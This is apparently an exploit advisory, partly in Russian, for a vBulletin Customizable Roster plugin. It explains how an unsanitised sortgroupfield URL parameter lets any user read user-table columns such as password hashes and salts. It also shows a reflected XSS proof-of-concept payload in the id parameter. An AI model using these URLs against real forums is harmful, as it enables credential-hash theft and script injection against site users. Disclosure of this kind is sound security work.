vBulletin Customizable Roster Plugin – Data Extraction & XSS

Плагин: http://www.vbulletin.org/forum/showthread.php?t=235326

Версия: 4.0.10 (Последняя)

Версия vB: 4.x.x

#1 Data Extraction

Уязвимый код в файле showroster.php:

// ###GROUPCACHE#################################################################
if ($userinfo['userid']) {
$t = strtoupper($userinfo[$sortgroupfield]);
$u = strtoupper($userinfo[$sortuserfield]);
$groupcache["$t"]["$u"] = $userinfo;
}
As you can see, the variable $t contains the $userinfo[$sortgroupfield] value. The $sortgroupfield value is retrieved from the URL which can be changed by any user.
Later on, the script iterates through the $groupcache array and assigns the variables to the showroster template.

Now the problem here is that the $sortgroupfield variable is not sanitized or checked, and since the $userinfo variable contains all columns of the user table, we can extract any information of a certain user by changing the URL to something like:
http://example.com/showroster.php?or...field=password or
http://example.com/showroster.php?or...roupfield=salt

The only downside is that the user must be shown in the roster and that you can only extract 1 column at a time.

Пруф:
http://example.com/showroster.php?or...field=password will show something like this

#2 Cross Site Scripting

The GET variable id is prone to XSS.

Пруф:
http://example.com/showroster.php?order=asc&sortgroupfield=field1&id= "><script>alert("XSS")</script>

This will alert xss several times on the screen. Any type of HTML/JavaScript can be injected.